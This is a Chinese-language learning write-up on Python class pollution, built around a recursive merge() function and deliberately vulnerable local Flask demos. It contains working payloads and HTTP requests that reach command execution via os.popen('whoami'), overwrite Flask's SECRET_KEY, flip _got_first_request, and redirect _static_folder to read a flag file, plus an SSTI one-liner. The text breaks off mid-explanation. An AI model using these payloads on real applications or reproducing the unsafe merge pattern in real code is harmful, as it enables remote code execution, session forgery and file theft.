0x01 前言 baseCTF里面的那几道我都是现学现做,只是知道污染怎么操作,并不知道为啥可以污染,这次让我彻底弄懂它!
0x02 question 父子类的继承 概念
父类是被继承的类,也称为基类或超类。父类中的属性和方法会被子类继承。
子类是从父类继承而来的类,也称为派生类。子类可以拥有父类的所有属性和方法,还可以添加新的属性和方法,或者重写父类的方法。
同时还有几个重要方法,这里直接引用一位师傅所写的
在Python中,定义类是通过class
关键字,class
后面紧接着是类名,紧接着是(object)
,表示该类是从哪个类继承下来的,所有类的本源都是object类
可以自由地给一个实例变量绑定属性,像js
由于类可以起到模板的作用,因此,可以在创建实例的时候,把一些我们认为必须绑定的属性强制填写进去。通过定义一个特殊的__init__
方法,在创建实例的时候,就把类内置的属性绑上
注意到__init__
方法的第一个参数永远是self
,表示创建的实例本身,因此,在__init__
方法内部,就可以把各种属性绑定到self
,因为self
就指向创建的实例本身。
当我们定义了一个类属性后,这个属性虽然归类所有,但类的所有实例都可以访问到
判断一个变量是否是某个类型可以用isinstance()
判断。
普通继承 在子类中,你可以使用 super()
函数来调用父类的方法。这在子类需要扩展而不是完全重写父类方法时特别有用。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 class Animal : def __init__ (self, name ): self .name = name def speak (self ): raise NotImplementedError("Subclass must implement this abstract method" ) def eat (self ): print (f"{self.name} is eating." ) class Dog (Animal ): def __init__ (self, name, breed ): super ().__init__(name) self .breed = breed def speak (self ): print (f"{self.name} says Woof!" ) def fetch (self ): print (f"{self.name} is fetching the ball." ) class Cat (Animal ): def __init__ (self, name, color ): super ().__init__(name) self .color = color def speak (self ): super ().speak() print (f"{self.name} says Meow!" ) def scratch (self ): print (f"{self.name} is scratching the furniture." ) instance = Cat("无情" ,"black" ) print (instance.name)
看看就行感觉没啥好讲的,看就能看懂
多重继承 一个子类可以继承多个父类
1 2 3 4 5 6 7 8 9 10 11 class Flyer : def fly (self ): print (f"{self.name} is flying." ) class Bird (Animal, Flyer): def __init__ (self, name, species ): super ().__init__(name) self .species = species def speak (self ): print (f"{self.name} chirps." )
方法的解析顺序我们靠mro()
来查看
计算规则是这样
子类优先于父类 :子类的方法和属性优先于父类的方法和属性。
父类的顺序 :如果一个类有多个父类,那么这些父类的顺序会保持不变。
唯一性 :MRO 列表中的每个类只出现一次。
但是这个实际的作用我还不知道是有啥,可能是效率问题?
污染过程解析 先看个最简单的demo
1 2 3 4 5 6 7 class test (): pass a=test() a.__class__='polluted' print (a.__class__)
这里直接污染发现报错了
1 TypeError: __class__ must be set to a class, not 'str' object
那么此时我们如果要污染属性的话就去寻找其内置属性即可,__qualname__
是用于访问类的名称
1 2 3 4 5 6 7 8 class test (): pass a=test() print (a.__class__)a.__class__.__qualname__='polluted' print (a.__class__)
而也就是说污染其实就是赋值,那么为了搞清楚原理,我们自己写段代码来调试就可以了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 class father : secret="hello" class son_a (father ): pass class son_b (father ): pass def merge (src,dst ): for k,v in src.items(): if hasattr (dst,'__getitem__' ): if dst.get(k) and type (v) == dict : merge(v,dst.get(k)) else : dst[k]=v elif hasattr (dst,k) and type (v) == dict : merge(v,getattr (dst,k)) else : setattr (dst,k,v) instance=son_b() payload={ "__class__" :{ "__base__" :{ "secret" :"world" } } } print (son_a.secret)print (instance.secret)merge(payload,instance) print (son_a.secret)print (instance.secret)
然后进行debug就可以懂了,这里我还是自己试一次,毕竟是初学者
但是我发现个问题,我使用VScode
始终进入不了merge
函数,那没办法,我就下载一个pycharm
吧,不过先讲讲函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 def merge (src,dst ): for k,v in src.items(): if hasattr (dst,'__getitem__' ): if dst.get(k) and type (v) == dict : merge(v,dst.get(k)) else : dst[k]=v elif hasattr (dst,k) and type (v) == dict : merge(v,getattr (dst,k)) else : setattr (dst,k,v)
欧克那么下来我们开始调试,打断点在merge(payload,instance)
处
可以看到我们的键为'__class__'
,值为{'__base__':{'secret':'world'}}
,下一步由于dst
不为字典直接到了elif
继续之后,发现键为'__base__'
,值为{'secret':'world'}
仍然是跳回到了这一步,继续看,再回来时,键为'secret'
,值为'world'
,现在的值已经不是字典了,所以直接跳转到了setattr
,进行赋值
赋值之后还有一个东西,请看jpg
可以看到此时也是dst
直接就指向地址了
那么我们就成功的通过当前类的__base__
去污染了secret
(现在这三个类的secret 都是world ),不过这仅仅只是一个内置属性,那能不能实现最大的利用直接污染object
呢
前面几步都在正常进行,可是到了后面,发现个问题,也就是我们刚才所有的回退那两步发现没了,从而直接报错,也就是说污染失败,得出结论
object的属性不能污染
不过那回退那三步 ,又是怎么回事呢,我们再写一个多层的来试试,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 class father : secret = "hello" nested = { "level1" : { "level2" : { "level3" : "initial_value" } } } class son_a (father ): pass class son_b (father ): pass def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) instance = son_b() payload = { "__class__" : { "__base__" : { "secret" : "world" , "nested" : { "level1" : { "level2" : { "level3" : "updated_value" , "new_level4" : "new_value" }, "new_level5" : "new_value" } } } } } print (son_a.secret)print (instance.secret)print (instance.nested)merge(payload, instance) print (son_a.secret)print (instance.secret)print (instance.nested)
换成这个代码进行debug
发现会在原地跳伍次
找规律都找的出来了吧,就是因为我们的payload
深度所导致的,查找payload
深度的方法
这样子debug
,看看什么时候会完全的往外跳,记录下跳的次数即为payload
深度
不过这样的话又要牵扯到python
的循环了,那么查找官方文档,其中我们知道
循环是进行迭代调用的,从一个最简单的demo
1 2 3 4 num=[1 ,2 ,3 ,4 ,5 ] for i in num: print (i)
这里进行调试会发现,每次进入之后跳出循环都会在for i in num:
跳一下
那么回到我们的test
1 2 3 4 5 6 7 8 9 10 11 def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v)
这里第一次通过elif
进入merge
函数,第二次也是,总共合起来就是三次循环,所以跳出时,也是需要原地跳三次才可跳出
那么再看一个最简单的demo
吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 from flask import Flask, request, jsonifyimport osapp = Flask(__name__) def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and isinstance (v, dict ): merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and isinstance (v, dict ): merge(getattr (dst, k), v) else : setattr (dst, k, v) class Demo : def __init__ (self, cmd ): self .cmd = cmd def execute (self ): return os.popen(self .cmd).read() @app.route('/merge_and_execute' , methods=['POST' ] ) def merge_and_execute (): data = request.json if not data or 'cmd' not in data: return jsonify({"error" : "Invalid input" }), 400 cmd_data = data['cmd' ] a = Demo('echo Hello' ) merge(cmd_data, a) result = a.execute() return jsonify({"result" : result}) if __name__ == '__main__' : app.run(host='127.0.0.1' ,debug=True )
直接污染cmd
就可以RCE
了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 POST /merge_and_execute HTTP/1.1 Host: 127.0.0.1:5000 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" sec-fetch-site: none sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document Connection: close Content-Length: 24 Content-Type: application/json {"cmd":{"cmd":"whoami"}}
属性污染以及寻找 这里就神似SSTI
中我们如何寻找可利用的方法了
原型链 如上面的,通过继承关系写出poc
即可,当然与此同时,并不只是我们自定义的属性可以污染,还有内置属性也可以,这里可以以这个属性为例子
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 class father : secret = "hello" class son_a (father ): pass class son_b (father ): pass def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) instance = son_b() payload = { "__class__" : { "__base__" : { "secret" : "world" , "__str__" :"polluted!" } } } print (father.__str__)merge(payload,instance) print (father.__str__)
成功污染,好玩好玩
非继承 globals 我们在flask
中进行SSTI
注入的时候一般就会先去寻找globals
,这里也是一样,我们直接去找就行了,不过注意的一点就是,如果我们不进行重写__init__
的话,是找不到的
未重写
1 2 3 4 5 6 7 8 9 10 11 12 class MyClass : pass print (type (MyClass.__init__))try : print (MyClass.__init__.__globals__) except AttributeError as e: print (e)
重写过后
1 2 3 4 5 6 7 8 class MyClass : def __init__ (self ): self .x = 10 print (type (MyClass.__init__)) print (MyClass.__init__.__globals__)
同时这里我们也发现,当其未被重写时,它的类型是 wrapper_descriptor
,没有__globals__
,被重写会变为function
,有__globals__
,请看demo
1 2 3 4 5 6 7 def demo (): pass class MyClass : def __init__ (self ): pass print (demo.__globals__ == globals () == MyClass.__init__.__globals__)
说了这么多别给你说迷糊了,我们的目的就是得到__globals__
,OK那么继续看
从SSTI的角度(flask)
1 {{cycler.__init__.__globals__.__builtins__['__import__' ]('os' ).popen('whoami' ).read()}}
那么我们进入cycler
源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 class Cycler (MutableSequence ): def __init__ (self, **kwargs ): self ._keys = [] self ._length = 1 self ._by_key = {} for key, val in kwargs.items(): if not hasattr (val, '__getitem__' ) or not hasattr (val, '__len__' ): raise TypeError(f"{key!r} does not support indexing/length" ) self ._keys.append(key) self ._by_key[key] = val self ._length = lcm(self ._length, len (val)) self ._index = 0
很明显看到__init__
是被重写了的,其他的不放了(太长了)
那么我们为啥要找这个东西,这再说说
{{ cycler.__init__.__globals__ }}
会返回 cycler
模块中 Cycler
类的 __init__
方法的全局命名空间。这个全局命名空间是一个字典,字典的内容如下
内置函数和模块 :如 __builtins__
。
导入的模块 :如 math
(如果 cycler
模块导入了 math
模块)。
定义的类和函数 :如 Cycler
类本身,以及其他在 cycler
模块中定义的类和函数。
其他全局变量 :如 cycler
模块中定义的其他变量。
理清楚了,来看demo,直接利用__globals__
污染属性和类属性
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 name="baozongwi" class son_a (): secret="nonono" class son_b (): def __init__ (self ): pass pass def merge (src,dst ): for k,v in src.items(): if hasattr (dst,'__getitem__' ): if dst.get(k) and type (v) == dict : merge(v,dst.get(k)) else : dst[k]=v elif hasattr (dst,k) and type (v) == dict : merge(v,getattr (dst,k)) else : setattr (dst,k,v) a=son_a() b=son_b() payload={ "__init__" :{ "__globals__" :{ "name" :"12SqweR" , "a" :{ "secret" :"good!!!" } } } } print (name)print (a.secret)merge(payload,b) print (name)print (a.secret)
这里我们就成功污染了,但是实际情况中,常常是存在于内置模块或者是第三方模块之中,此时我们就不太好找关系了。不过还是有很多办法的
sys 那么就要使用sys
,因为sys
模块的modules
属性以字典的形式包含了程序自开始运行时所有已加载过的模块,可以直接从该属性中获取到目标模块,并随着模块的导入而动态更新。
test.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 import sysimport sonclass son_a (): secret="nonono" class son_b (): def __init__ (self ): pass pass def merge (src,dst ): for k,v in src.items(): if hasattr (dst,'__getitem__' ): if dst.get(k) and type (v) == dict : merge(v,dst.get(k)) else : dst[k]=v elif hasattr (dst,k) and type (v) == dict : merge(v,getattr (dst,k)) else : setattr (dst,k,v) payload={ "__init__" :{ "__globals__" :{ "sys" :{ "modules" :{ "son" :{ "son_test" :{ "secret" :"good!!!" } } } } } } } b=son_b() print (son.son_test.secret)merge(payload,b) print (son.son_test.secret)
son.py
1 2 class son_test : secret="nonono"
这里就以导入第三方块示例了
Loader加载器 __loader__
是一个属性,它存在于每个已导入的模块对象中。这个属性指向一个加载器对象,该对象负责加载该模块。在一些场景中常常伴有着importlib
模块的使用,那么这个时候我们就可以使用loader
加载器来进行sys
模块的加载从而达到目的
加载器这个东西可以简单看看
**BuiltinImporter
**:
1 2 3 import mathprint (math.__loader__)
**SourceFileLoader
**:
1 2 3 import son print (son.__loader__)
**ExtensionFileLoader
**:
1 2 3 import numpyprint (numpy.__loader__)
只要是BuiltinImporter
的加载器都行,所以这里还有spec 也能用
那么来看demo吧
son.py
1 2 class son_test (): secret="nonono"
test.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 import importlibimport sonclass son_a (): secret="nonono" class son_b (): def __init__ (self ): pass pass def merge (src,dst ): for k,v in src.items(): if hasattr (dst,'__getitem__' ): if dst.get(k) and type (v) == dict : merge(v,dst.get(k)) else : dst[k]=v elif hasattr (dst,k) and type (v) == dict : merge(v,getattr (dst,k)) else : setattr (dst,k,v) print ("sys" in dir (__import__ ("importlib" )))payload={ "__init__" :{ "__globals__" :{ "importlib" :{ "__loader__" :{ "__init__" :{ "__globals__" :{ "sys" :{ "modules" :{ "son" :{ "son_test" :{ "secret" :"good" } } } } } } } } } } } b=son_b() print (son.son_test.secret)merge(payload,b) print (son.son_test.secret)
然后__spec__
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 import mathimport sonclass son_a (): secret="nonono" class son_b (): def __init__ (self ): pass pass def merge (src,dst ): for k,v in src.items(): if hasattr (dst,'__getitem__' ): if dst.get(k) and type (v) == dict : merge(v,dst.get(k)) else : dst[k]=v elif hasattr (dst,k) and type (v) == dict : merge(v,getattr (dst,k)) else : setattr (dst,k,v) payload={ "__init__" :{ "__globals__" :{ "math" :{ "__spec__" :{ "__init__" :{ "__globals__" :{ "sys" :{ "modules" :{ "son" :{ "son_test" :{ "secret" :"good" } } } } } } } } } } } b=son_b() print (son.son_test.secret)merge(payload,b) print (son.son_test.secret)
大家比照一下,很明显__spec__
限制更少,我在实验的时候用math
的loader来加载sys,结果弄半天后面一直不成功,于是看看有没有结果false
1 print ("sys" in dir (__import__ ("math" )))
函数形参默认值替换 __defaults__
是一个元组 ,用于存储函数或方法的默认参数值。当我们去定义一个函数时,可以为其中的参数指定默认值。这些默认值会被存储在__defaults__
元组 中。我们可以通过这个属性来污染参数默认值
1 2 3 4 5 def a (x,y=2 ,z=3 ): pass print (a.__defaults__)
这是一个函数,有三个参数,其中一个必填参数(x
),还有两个是可选参数(y
,z
),再多看看,把__default__
看懂
1 2 3 4 5 def func_b (var_1, var_2 ): pass print (func_b.__defaults__)
那么再来看个特殊的
/
之前的参数 :
这些参数是 位置参数 (positional-only parameters)。
它们只能通过位置传递,不能通过关键字传递。
/
和 *
之间的参数 :
这些参数既可以是 位置参数 ,也可以是 关键字参数 。
它们可以通过位置或关键字传递。
*
之后的参数 :
这些参数是 关键字参数 (keyword-only parameters)。
它们只能通过关键字传递,不能通过位置传递。
有默认值但是不计入__defualts__
1 2 3 4 5 def a (x,/,y=2 ,*,z=3 ): pass a(x=1 )
1 2 3 4 5 def a (x,/,y=2 ,*,z=3 ): pass a(1 ,4 ,6 )
1 2 3 4 5 6 def a (x,/,y=2 ,*,z=3 ): print (x,y,z) pass a(1 ,4 ,z=6 ) print (a.__defaults__)
欧克懂了之后来污染吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 def demo (x,name="baozongwi" ,age="99" ): if name != "12SqweR" : print (x) else : if age != "99" : print (__import__ ("os" ).popen(x).read()) class A : def __init__ (self ): pass def merge (src,dst ): for k,v in src.items(): if hasattr (dst,'__getitem__' ): if dst.get(k) and type (v) == dict : merge(v,dst.get(k)) else : dst[k]=v elif hasattr (dst,k) and type (v) == dict : merge(v,getattr (dst,k)) else : setattr (dst,k,v) a=A() b=demo payload={ "__init__" :{ "__globals__" :{ "demo" :{ "__defaults__" : ("12SqweR" ,"100" ) } } } } print (b.__defaults__)merge(payload,a) print (b.__defaults__)c=demo("whoami" )
这个__defaults__
的写法一定要对,是元组,不然就失败,当然如果是True
或者False
的话,就可以直接写
这里给看看我的错误写法,
首先我加了大括号,不是元组,然后modules
里面还只有模块,所以直接鸭溪啦
后来我查看一些污染类文章发现用sys
一样可以
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 import sysdef demo (x, name="baozongwi" , age="99" ): if name != "12SqweR" : print (x) else : if age != "99" : print (__import__ ("os" ).popen(x).read()) class A : def __init__ (self ): pass def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) a = A() b = demo payload = { "__init__" : { "__globals__" : { "sys" : { "modules" : { "__main__" : { "demo" : { "__defaults__" : ("12SqweR" , "100" ) } } } } } } } print (b.__defaults__) merge(payload, a) print (b.__defaults__) c = demo("whoami" )
除了__defaults__
还有__kwdefaults__
,大差不差,只不过这个是字典,cancan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 def func_a (var_1, var_2 =2 , var_3 = 3 ): pass def func_b (var_1, /, var_2 =2 , var_3 = 3 ): pass def func_c (var_1, var_2 =2 , *, var_3 = 3 ): pass def func_d (var_1, /, var_2 =2 , *, var_3 = 3 ): pass print (func_a.__kwdefaults__)print (func_b.__kwdefaults__)print (func_c.__kwdefaults__)print (func_d.__kwdefaults__)
发现只有关键字参数的默认值才会返回
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 def demo (x,*,name="baozongwi" ,age="99" ): if name != "12SqweR" : print (x) else : if age != "99" : print (__import__ ("os" ).popen(x).read()) class A : def __init__ (self ): pass def merge (src,dst ): for k,v in src.items(): if hasattr (dst,'__getitem__' ): if dst.get(k) and type (v) == dict : merge(v,dst.get(k)) else : dst[k]=v elif hasattr (dst,k) and type (v) == dict : merge(v,getattr (dst,k)) else : setattr (dst,k,v) a=A() b=demo payload={ "__init__" :{ "__globals__" :{ "demo" :{ "__kwdefaults__" : dict (name="12SqweR" ,age="100" ) } } } } print (b.__kwdefaults__)merge(payload,a) print (b.__kwdefaults__)c=demo("whoami" )
关键信息替换 session_key 有些时候当我们不知道key的时候,并且审计代码或者尝试,发现可以污染的时候,那我们可以直接污染为自己想要的可控值,那么此时session就可以任意伪造了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 from flask import Flask,requestimport jsonapp = Flask(__name__) app.config['SECRET_KEY' ]="who are you" def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) class cls (): def __init__ (self ): pass instance = cls() @app.route('/' ,methods=['POST' , 'GET' ] ) def index (): print (app.config['SECRET_KEY' ]) if request.data: merge(json.loads(request.data), instance) return "[+]Config:%s" %(app.config['SECRET_KEY' ]) app.run(host="0.0.0.0" )
直接污染
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 POST / HTTP/1.1 Host: 127.0.0.1:5000 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" sec-fetch-site: none sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document Connection: close Content-Type: application/json Content-Length: 189 { "__init__":{ "__globals__":{ "app":{ "config":{ "SECRET_KEY":"mine" } } } } }
_got_first_request 这里对版本有要求我们给自己降个级
1 2 3 4 5 pip install werkzeug==2.0.3 pip install Flask==2.1.0 pip install --upgrade werkzeug pip install --upgrade Flask
等会升级回来就好了
_got_first_request
是 Flask 应用内部的一个属性,用于跟踪是否已经处理了第一个请求。这个属性主要用于实现 before_first_request
装饰器的功能,但在 Flask 2.2.0 版本中,before_first_request
装饰器已经被移除,因此 _got_first_request
也失去了其主要用途。
就是场景就是有些时候为了安全,会只允许一些特定操作,比如必须在before_first_request
装饰器实现一些东西,看看这个装饰器的源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 class Flask (WerkzeugApp ): def __init__ (self, import_name, static_url_path=None , static_folder='static' , static_host=None , host_matching=False , subdomain_matching=False , template_folder='templates' , instance_path=None , instance_relative_config=False , root_path=None ): self .before_first_request_funcs = [] def before_first_request (self, f ): """Register a function to be run before the first request only.""" self .before_first_request_funcs.append(f) return f def _got_first_request (self ): if self ._got_first_request: return self ._got_first_request = True for func in self .before_first_request_funcs: func() def process_response (self, response ): """Can be overridden in order to modify the response object before it's sent to the client.""" self ._got_first_request() return response def preprocess_request (self ): """Called before the actual request dispatching and will ensure that :meth:`before_request` functions and URL value matching are done. If this returns a response the regular request handling is skipped and the returned response is sent instead. """ self ._got_first_request() return None
主要就是这里
1 2 3 4 5 6 def _got_first_request (self ): if self ._got_first_request: return self ._got_first_request = True for func in self .before_first_request_funcs: func()
也就是说我们如果要调用这个装饰器中的函数,必须让_got_first_request
为false
这里我们如果可以污染的话就非常good
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 from flask import Flask,requestimport jsonapp = Flask(__name__) def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) class cls (): def __init__ (self ): pass instance = cls() flag = "Is flag here?" @app.before_first_request def init (): global flag if hasattr (app, "special" ) and app.special == "U_Polluted_It" : flag = open ("flag" , "rt" ).read() @app.route('/' ,methods=['POST' , 'GET' ] ) def index (): if request.data: merge(json.loads(request.data), instance) global flag setattr (app, "special" , "U_Polluted_It" ) return flag app.run(host="0.0.0.0" )
还要创建一个flag文件,自己随便来
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 POST / HTTP/1.1 Host: 127.0.0.1:5000 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" sec-fetch-site: none sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document Connection: close Content-Type: application/json Content-Length: 145 { "__init__":{ "__globals__":{ "app":{ "_got_first_request":false } } } }
这里还有一个点,就是因为版本问题false
必须写成这样子,而不是False
_static_url_path 这个属性用于定义静态文件的目录,默认情况下,Flask 会从 static
文件夹中提供静态文件。所以我们只要污染这个属性就可以进行目录穿越
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 class Flask (WerkzeugApp ): def __init__ (self, import_name, static_url_path=None , static_folder='static' , static_host=None , host_matching=False , subdomain_matching=False , template_folder='templates' , instance_path=None , instance_relative_config=False , root_path=None ): if static_url_path is not None : self ._static_url_path = static_url_path else : self ._static_url_path = '/static' if static_folder is not None : self .static_folder = static_folder else : self .static_folder = 'static'
查了一下,_static_folder
控制了实际静态文件所在位置,我们自己起环境试试
1 2 3 4 5 <html > <h1 > hello</h1 > <body > </body > </html >
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 from flask import Flask,requestimport jsonapp = Flask(__name__) def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) class cls (): def __init__ (self ): pass instance = cls() @app.route('/' ,methods=['POST' , 'GET' ] ) def index (): if request.data: merge(json.loads(request.data), instance) return "flag in ./flag but heres only static/index.html" app.run(host="0.0.0.0" )
还得是服务器啊,本地老是出问题,不知道为啥
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 POST / HTTP/1.1 Host: ip:5000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45 Connection: close Content-Type: application/json Content-Length: 142 { "__init__":{ "__globals__":{ "app":{ "_static_folder":"./" } } } }
然后污染成功就可以啦
1 2 3 4 5 6 7 8 9 10 11 12 GET /static/flag HTTP/1.1 Host: ip:5000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45 Connection: close
注意搭建环境的时候目录是这样的
os.path.pardir 这里test
时把static
文件夹改成templates
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 from flask import Flask,request,render_templateimport jsonimport osapp = Flask(__name__) def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) class cls (): def __init__ (self ): pass instance = cls() @app.route('/' ,methods=['POST' , 'GET' ] ) def index (): if request.data: merge(json.loads(request.data), instance) return "flag in ./flag but u just can use /file to vist ./templates/file" @app.route("/<path:path>" ) def render_page (path ): if not os.path.exists("templates/" + path): return "not found" , 404 return render_template(path) app.run(host="0.0.0.0" ,port=5000 ,debug=True )
这里很明显我们要目录穿越,但是它只让我们查看/templates
里面的文件,那怎么办呢,先穿越,打出报错(但是像之前进行pin码计算一样,我也不能稳定的打出报错),访问/test.py
打出报错,由于我们这里是因为渲染的报错,所以我们跟进这个
使用Ctrl+鼠标左键
跟进来之后发现
继续跟进,注意我们这里是因为path
的原因导致的渲染失败,所以我们进来找path
这个函数把我们的路径进行拆分,估计是这里有问题,还有就是我标的那个符号,引用Infernity 师傅的话
这个符号名为重写符号,对父类进行重写,我们跟进的时候只需要看自己需要哪个,就找哪个
所以这里我们是路径问题,找到了第二个get_source
